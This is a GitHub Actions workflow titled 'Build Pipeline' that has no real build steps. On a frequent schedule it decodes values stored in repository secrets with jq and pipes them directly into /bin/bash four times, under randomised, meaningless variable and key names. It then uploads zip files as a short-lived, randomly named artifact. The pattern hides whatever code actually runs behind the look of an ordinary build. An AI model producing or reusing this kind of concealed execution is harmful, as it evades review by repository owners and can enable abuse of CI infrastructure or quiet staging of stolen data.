name: Build Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '8 1,7,13,19 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}-${{ github.ref }}
  cancel-in-progress: true
jobs:
  runner:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Go
        env:
          fflk87: ${{ secrets.fflk87 }}
        run: |
          printf '%s' "$fflk87" | jq -r .uv31036 | /bin/bash
          printf '%s' "$qh31822" | jq -r .i7 | /bin/bash
          printf '%s' "$tul565" | jq -r .rl800 | /bin/bash
          printf '%s' "$ti4385" | jq -r .mjy29 | /bin/bash

      - name: Archive results
        uses: actions/upload-artifact@v4
        with:
          name: XzuSI9Mw
          path: "*.zip"
          retention-days: 1
